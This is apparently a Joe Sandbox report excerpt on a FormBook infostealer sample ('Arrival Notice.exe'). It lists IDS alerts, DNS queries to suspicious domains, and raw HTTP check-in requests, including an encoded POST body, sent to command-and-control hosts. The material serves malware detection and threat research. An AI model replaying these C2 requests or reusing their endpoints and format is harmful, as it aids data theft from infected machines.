Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49979 -> 209.74.64.58:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 96.126.123.244:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49985 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50009 -> 172.67.221.220:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 20.2.208.137:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50026 -> 144.76.190.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50025 -> 144.76.190.39:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50014 -> 91.184.0.200:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50018 -> 217.160.0.60:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50011 -> 91.184.0.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 96.126.123.244:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50023 -> 144.76.190.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50019 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50008 -> 172.67.221.220:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50017 -> 217.160.0.60:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49992 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50020 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49977 -> 66.29.146.173:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50007 -> 172.67.221.220:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:50010 -> 172.67.221.220:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49998 -> 96.126.123.244:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50000 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:50024 -> 144.76.190.39:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.rtpakuratkribo.xyz
Source:	DNS query: www.idaschem.xyz
Source:	DNS query: www.030003452.xyz

Source: Joe Sandbox View

IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: HOSTNETNL HOSTNETNL

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49744
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.7:49951

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Arrival Notice.exe

Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,

0_2_004422FE

Source: global traffic	HTTP traffic detected: GET /4bhh/?m2gpQ=qVEhfIHZC/LrType2rBHfLPSl0/OSjD2TKGEGSewNOQTw+ALrB9paARDDp1DVoSDqn+95aH9GG7zoH9yEvfJnuv1rwGVZHrlJTCOHoay8LjwAA5ZI3MNl68qZc1+kbfm1rx6EKcKPurO&KjH=KRIxdVHP60TD8 HTTP/1.1Host: www.39978.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /sciu/?m2gpQ=YIkuFVuW2E28e4WkTeJVCzzknQiQ0fQ5lFYo7Kt/9G+eExaeK9iNv/1DyEL0uQ9QqookS/lhd7RPtmaZyJokLYniVjhicuG4fHS3nSlILxZzvAKFwxHmhkRjxK9ClG7JmJxrzRt3MvPo&KjH=KRIxdVHP60TD8 HTTP/1.1Host: www.vnxoso88.artAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /7m52/?m2gpQ=KUfzNxzC0/tkF/Sfag5rxehoMO8NdG75VoGUrTTYHgYMfDszE7nAAPd4WyzgZAEusu3dyfDqSmUHPfAxKZywGgYzE1+gbAbmefiRMJeaIMpM+K6CCyvQgZeaisFx9/9ei8/+pPx29LDH&KjH=KRIxdVHP60TD8 HTTP/1.1Host: www.rtpakuratkribo.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /khsn/?m2gpQ=TXD/9ddHP74eJYFExo0CjTUKkcm39u6VsxdqO5O9CqX8y9tdKNpr+RH/ydKFsRdYIeJS6PQWxoGMZT8zvmt3ATvVqoxwavOvPc4jEyVJChxhY6BZ1VVxdG/duJ25EixLuzB68GCTq/xk&KjH=KRIxdVHP60TD8 HTTP/1.1Host: www.pluribiz.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /k45l/?KjH=KRIxdVHP60TD8&m2gpQ=eEsmO3tqxgZhecFuD1iDKSUxkj6BCtqtHYZ6OUA3SqEwtG4TBmhjXYADabhkz5bgV/61+lmRmR6oEEDWXEosNoiXdOP4Lj5MSzeooDlhyxnqAyQltERXmLQw2Ss2SnlAtV+TG/a37xhv HTTP/1.1Host: www.idaschem.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /g8fb/?m2gpQ=YIk8BARVWSn/QuGUQnkYsazoDYcX4x9RQfS4QBmHenTb8HDBBCrEcM3ZVamem1jnr3BtnBAXBF5diw+d30GcsvfF4YEeTq91lSuPwlPrCtk82kMLzGGbulJdlPGFAXTDhsCQnbqSco+x&KjH=KRIxdVHP60TD8 HTTP/1.1Host: www.b2iqd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /phav/?m2gpQ=AsRIlW4lFKT9Nge6nW8q5kZJ9+aApraoCL+7EeDUtaFqAdK5eeKmvpb7/el6gzXbva7HD1PGy27Em9no4zvTQ2Xe2FD0eGM44XV8TC1BDup3KiSR4IJPoQsxoY4gT4/b1NYL9SIl9eH2&KjH=KRIxdVHP60TD8 HTTP/1.1Host: www.ipk.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /ezhm/?m2gpQ=dQjGhxXMHv5+YwjryQcJrySkOGIlRyTTAmxJxQLZURFTEZTj1YJRXXyzUfzSUuBT8AWS6f5Uz3vbXV/G8YOf4Jqhl0le5SLuNKA+C9qBgvFZXkaOdih32u0uCf5d5IJ7EKd73Mp04V7U&KjH=KRIxdVHP60TD8 HTTP/1.1Host: www.jigg.spaceAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /tqc2/?m2gpQ=EkjiWUwG3ohs+TM4TlGrX762MTxbJNqBztSStbX9jWSqgmIiHV+G9e22XLXvdY+CpYL3+KW1Lj2pkjsh45K8Km++cQEoOKGWr6yUp6/3Gdm0z29MECdpMSDGGxPrHF2ZKiEDH4kL+yTJ&KjH=KRIxdVHP60TD8 HTTP/1.1Host: www.dccf.earthAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /igdb/?m2gpQ=KXN5KYh60A7gMeE/7y9YbJzEbAj8u76Oa7v3ksdE5fh6bb2RqZZNkEsyTM378ew6A9/zEQ377mgRVV6fU1aJNiBJJDK/aOKNmWDYuBDypW14EWrdExPUlDeAnVHwUf34I6IJZnQL8H13&KjH=KRIxdVHP60TD8 HTTP/1.1Host: www.gamebaitopzo.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /9tmz/?KjH=KRIxdVHP60TD8&m2gpQ=NV1tTcsqNp6kYU/NXIxVbRYgayRVnArU9EiSb08h70XbT7GakAVreBKCJMPRzvHbWdCzhb2rvOXrdRlLN/AVokaQeP6tHquK0CCjiZSviNcmDdeyv9j5LfcBhXqGhSsmGfBUz+LOACLV HTTP/1.1Host: www.megaweb8.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /znb6/?m2gpQ=4z8JxI0nRVLXBlRrydZdwmqPRLgcHgod4ZZEwprDCqeuR1X4EJPq9hqUp4XV2iNrlK1zceLjjdxAFB8hiM3pNAL8f7bcCQHaun+lOMiDBkB7id3F4mO5dhanL54VXfzZsnkFdU/HHMoW&KjH=KRIxdVHP60TD8 HTTP/1.1Host: www.wethebeststore.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /1jhj/?m2gpQ=YfW+isNxg3o3M+3b8iUoLSe7bztYi80mfWBugJ2MJlsi+oKL/t+PoAeEH7mT5YnCbxa2fokj9utgMIVvF1qc1kyP51+K5wadj8Hc7obOiRyGIBJp8NxnCEZeYebMQAIMmW1V2iVRSYza&KjH=KRIxdVHP60TD8 HTTP/1.1Host: www.solarand.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /7nfi/?m2gpQ=Hc05NKMVGljRJ208GoJiuvJwS+qtlqhBfxwxnuqPPp/t3suBlIaw+qLklfi1FFvtvcqP4hR32up8rQp3nsg47f9wbTR1iuyCcnVpZrM4KA8DS5fnn6F+xl7ZQWTXNpehtq7GmXwpqKtZ&KjH=KRIxdVHP60TD8 HTTP/1.1Host: www.030003452.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Source: global traffic	HTTP traffic detected: GET /cop9/?KjH=KRIxdVHP60TD8&m2gpQ=Dzm3lrGSWWKZ8d6JM+prrPLynhO90ZRuHyYf7unPNgg/3SGnvxfS4q3U7MLR/+yk1Q2rwqljseJsL4/cnipgQGBqHPAYb0JP0ikc1qr6EU87NkgIVx/qiQJVlVgkqy/u0Urju/xz+Ouj HTTP/1.1Host: www.basicreviews.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2

Source: global traffic	DNS traffic detected: DNS query: www.39978.club
Source: global traffic	DNS traffic detected: DNS query: www.vnxoso88.art
Source: global traffic	DNS traffic detected: DNS query: www.rtpakuratkribo.xyz
Source: global traffic	DNS traffic detected: DNS query: www.pluribiz.life
Source: global traffic	DNS traffic detected: DNS query: www.idaschem.xyz
Source: global traffic	DNS traffic detected: DNS query: www.b2iqd.top
Source: global traffic	DNS traffic detected: DNS query: www.ipk.app
Source: global traffic	DNS traffic detected: DNS query: www.jigg.space
Source: global traffic	DNS traffic detected: DNS query: www.dccf.earth
Source: global traffic	DNS traffic detected: DNS query: www.gamebaitopzo.fun
Source: global traffic	DNS traffic detected: DNS query: www.megaweb8.top
Source: global traffic	DNS traffic detected: DNS query: www.wethebeststore.online
Source: global traffic	DNS traffic detected: DNS query: www.solarand.online
Source: global traffic	DNS traffic detected: DNS query: www.030003452.xyz
Source: global traffic	DNS traffic detected: DNS query: www.basicreviews.online

Source: unknown

HTTP traffic detected: POST /sciu/ HTTP/1.1Host: www.vnxoso88.artAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,enOrigin: http://www.vnxoso88.artCache-Control: max-age=0Content-Length: 218Content-Type: application/x-www-form-urlencodedConnection: closeReferer: http://www.vnxoso88.art/sciu/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2Data Raw: 6d 32 67 70 51 3d 56 4b 4d 4f 47 6a 47 39 71 33 43 33 4b 59 44 35 53 38 4a 6a 59 77 72 34 6d 51 47 73 6a 2b 38 71 75 42 6f 4f 39 61 59 4c 7a 67 66 54 41 6a 32 2f 42 4f 32 57 76 38 56 4e 37 77 57 47 6d 57 4a 79 2b 4c 34 6a 59 66 74 68 4d 36 55 6b 6d 47 50 36 35 62 5a 56 53 2b 4c 5a 61 45 38 64 5a 34 6d 49 5a 57 4c 4f 6e 56 78 2f 42 45 77 56 2f 78 65 61 76 68 50 75 68 52 42 47 34 72 46 61 70 54 76 30 68 75 73 62 73 58 70 5a 41 39 76 41 32 69 52 46 2b 6f 52 45 35 73 55 79 6f 7a 65 61 6c 37 58 75 7a 65 71 4d 2b 66 42 72 49 68 32 66 30 52 65 6e 77 54 6b 61 78 67 72 46 76 6f 65 65 4c 45 35 36 31 65 45 34 78 38 67 6c 4c 69 72 68 65 74 53 6b 6f 41 3d 3d Data Ascii: m2gpQ=VKMOGjG9q3C3KYD5S8JjYwr4mQGsj+8quBoO9aYLzgfTAj2/BO2Wv8VN7wWGmWJy+L4jYfthM6UkmGP65bZVS+LZaE8dZ4mIZWLOnVx/BEwV/xeavhPuhRBG4rFapTv0husbsXpZA9vA2iRF+oRE5sUyozeal7XuzeqM+fBrIh2f0RenwTkaxgrFvoeeLE561eE4x8glLirhetSkoA==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 12 Nov 2024 06:55:22 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 12 Nov 2024 06:55:24 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 12 Nov 2024 06:55:27 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 